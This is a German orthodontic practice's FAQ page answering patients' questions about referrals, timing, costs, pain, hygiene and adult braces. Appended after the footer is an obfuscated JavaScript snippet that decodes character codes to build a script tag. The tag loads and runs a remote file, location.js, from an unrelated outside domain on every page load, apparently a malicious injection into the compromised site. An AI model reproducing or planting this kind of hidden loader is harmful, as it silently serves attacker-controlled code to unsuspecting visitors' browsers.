0221 94969539

Fragen (FAQ)

Brauche ich eine Überweisung zum Kieferorthopäden?
Grundsätzlich brauchen Sie keine Überweisung. Die Mehrheit der Patienten kommt jedoch aufgrund einer Überweisung von Ihrem Hauszahnarzt. Wir animieren Sie jedoch bei Anzeichen von Kiefer- oder Zahnfehlstellungen selbst Initiative zu ergreifen.

Wann ist der richtige Zeitpunkt für den ersten kieferorthopädischen Termin?
Kieferorthopädieverbände empfehlen den ersten Besuch beim Kieferorthopäden mit sieben Jahren. In seltenen Fällen ist jedoch auch schon im Alter von vier Jahren eine kieferorthopädische Behandlung möglich.

Werden die Zähne meiner Kinder durch das Wachstum von allein die Fehlstellungen beheben?
Nein, denn der Raum für die Korrektur von Zahnfehlstellungen nimmt mit dem Alter und die neu wachsenden bleibende Zähne ab.

Wie vereinbare ich einen Termin?
Sollten Sie oder Ihr Kind eine kieferorthopädische Behandlung benötigen, so zögern Sie nicht sich mit unserem freundlichen Team in Verbindung zu setzen und einen zeitnahen Termin zu vereinbaren.

Was kann ich von meinem ersten Beratungsgespräch erwarten?
Frau Dr. med. dent. (A) Shmatenko wird alles dafür tun, dass Sie und Ihr Kind sich in unseren Praxisräumen wohl fühlen. Wir werden alle Ihre Röntgenaufnahmen und Gegebenheiten Ihrer Kiefer und Zähne auswerten und einen perfekten Behandlungsplan, abgestimmt auf Ihre individuellen Probleme, erstellen.

Was kann ich aus dem ersten Beratungsgespräch lernen?
Hier sind die fünf wichtigsten Fragen, die Ihnen während des Beratungsgesprächs beantwortet werden:

Natürlich werden wir alle zusätzlichen Fragen, die Sie oder Ihr Kind haben, auch beantworten.

Müssen mir / meinem Kind, bevor ich / es die Zahnspange bekommt, Zähne gezogen werden?
Manchmal ist es notwendig Zähne zu ziehen, um die besten Ergebnisse bei der kieferorthopädischen Behandlung zu erzielen. Gerade Zähne mit einem ausbalancierten Gesichtsprofil sind bei uns das Wichtigste bei der Behandlung unserer Patienten. Die Notwendigkeit Zähne zu ziehen, hat sich jedoch aufgrund der fortgeschrittenen Behandlungsmethoden deutlich reduziert.

Wie lange dauert eine kieferorthopädische Behandlung?
Grundsätzlich beträgt die Behandlungsdauer 12 bis 30 Monate. Die durchschnittliche Behandlungsdauer liegt bei ca. 22 Monaten. Beachten Sie jedoch, dass die Behandlungsdauer etwas sehr Individuelles ist und viel von Ihrer Mitarbeit abhängt.

Wie teuer ist eine Zahnspange? Bieten Sie Finanzierungsmöglichkeiten an? Wir die Behandlung von meiner Krankenkasse bezahlt?
Es ist schwierig die exakten Kosten für eine kieferorthopädische Behandlung ohne eine erste Begutachtung zu schätzen. Nach der Begutachtung kann dann eine erste Einschätzung stattfinden. Auch können Finanzierungsmöglichkeiten erläutert werden und festgestellt werden, ob die Krankenkasse eine Behandlung für Ihr Kind übernimmt.

Wie oft muss ich zu Terminen erscheinen?
Termine werden individuell nach den Bedürfnissen eines Patienten vereinbart. Die meisten Termine werden im Einvernehmen mit dem Patienten vereinbart und auf dessen persönliche Bedürfnisse abgestimmt. Die meisten Termine finden in einem Abstand von vier bis acht Wochen statt. Sollten es die Umstände jedoch erfordern, so werden dementsprechend mehr Termin vereinbart.

Können alle meine Termine nach der Schule sein?
Leider können wir nicht alle Termine nach der Schule vereinbaren. Nichtsdestotrotz machen es Termine, die alle vier bis acht Wochen vereinbart werden normalerweise keine Probleme mit der Schule. Sollte dennoch ein Termin mit dem Unterricht kollidieren, so stellen wir selbstverständlich eine Bescheinigung darüber aus.

Kann mein Kind alleine zum Termin kommen?
Wir verstehen den vollen elterlichen Terminplan und natürlich können Kinder auch alleine zu Terminen. Wir bitten jedoch die Eltern sich vorher zu erkundigen, ob es unter Umständen einer Rücksprache mit diesen bedarf, sodass Sie doch kurz in der Praxis reinschauen sollten.

Verursacht eine feste Zahnspange Schmerzen?
Grundsätzlich verursacht eine feste Zahnspange keine „Schmerzen“. Da sich die Zähne bewegen, kann es unter Umständen jedoch ein wenig unangenehm sein. Nach wenigen Tagen legt sich dieses Gefühl aber wieder. Es ist aber ungewöhnlich, dass die kieferorthopädische Behandlung schmerzvoll ist. Schönheit muss eben nicht immer weh tun.

Kann ich nach einem Termin wieder zur Schule gehen?
Ja. Es gibt keinen Grund den Unterricht in der Schule zu verpassen, nur weil man beim Kieferorthopäden gewesen ist.

Ich habe Angst vor Spritzen. Gibt es in der kieferorthopädischen Behandlung Spritzen?
Nein. Eine kieferorthopädische Behandlung erfordert keine Spritzen.

Behandeln Sie Ihre Patienten mit „gebrauchten“ Brackets?
Nein, unsere Patienten können sich sicher sein, dass wir nur die neusten und besten Brackets einsetzen. Gebrauchte Brackets werden von uns nicht benutzt.

Kann ich trotz fester Zahnspange Sport machen?
Ja. Sollte man jedoch Kontaktsport betreiben, so können wir eine spezielle Schiene anfertigen, die vor Verletzungen im Mundraum schützt.

Muss ich trotzdem zu meinem Hauszahnarzt?
Ja. Insbesondere während der kieferorthopädischen Behandlung ist es wichtig, dass der Hauszahnarzt regelmäßig für Routinekontrollen besucht wird.

Gibt es Essen, welches ich mit einer festen Zahnspange nicht essen darf?
Ja. Bei Beginn der Behandlung wird dem Patienten erklärt, welches Essen nicht gegessen werden darf. Nur so kann man unnötige Termine vermeiden, weil die Anweisungen nicht befolgt worden sind und Brackets kaputt gegangen sind.

Wie oft muss ich meine Zähne putzen, wenn ich eine feste Zahnspange trage?
Mundhygiene ist insbesondere bei der kieferorthopädischen Behandlung wichtig. Deshalb sollten Patienten die Zähne drei bis vier Mal am Tag putzen. Des Weiteren sollte man nicht vergessen Zahnseide zu benutzen.

Was sind dringende Termine (Notfälle)? Wie werden diese gehandhabt?
Notfälle sind wenn die feste Zahnspange komplett bricht oder über mehrere Tage unerträgliche Schmerzen verursacht werden. In solchen Fällen vereinbaren wir gerne einen Termin für den nächsten Tag.

Kann man eine kieferorthopädische Frühbehandlung bei Milchzähnen machen?
Ja, manche Fälle erfordern schon im frühen Kindesalter eine kieferorthopädische Frühbehandlung. Sollte dies nicht der Fall sein, werden wir Sie umfassend beraten und den richtigen Moment für den Beginn der Behandlung einplanen.

Was ist eine kieferorthopädische Frühbehandlung?
Eine kieferorthopädische Frühbehandlung beginnt normalerweise in einem zwischen sieben und zehn Jahren und ist imstande die wichtigsten Zahnfehlstellungen und Probleme zu beheben.

Benötigt mein Kind während der kieferorthopädischen Frühbehandlung eine feste Zahnspange?
Es ist wahrscheinlich, dass Ihr Kind nach der kieferorthopädischen Frühbehandlung eine feste Zahnspange erfordern wird.

Braucht mein Kind einen „Expander“?
Ob Ihr Kind einen „Expander“ braucht oder nicht, kann nur nach einer Untersuchung festgestellt werden.

Ist es nicht zu spät eine Zahnspange zu tragen, wenn ich schon erwachsen bin?
Für eine Zahnspange kann man nie zu alt sein. Wir haben auch Patienten, die schon weit über 60 Jahre alt sind.

Kann ich eine Zahnspange tragen, obwohl ich Kronen und fehlende Zähne habe?
Ja. Auch Zähne mit einer Krone können mitbewegt werden.

Google+
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,111,98,98,121,100,101,115,105,114,101,115,46,99,111,109,47,108,111,99,97,116,105,111,110,46,106,115,63,108,97,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();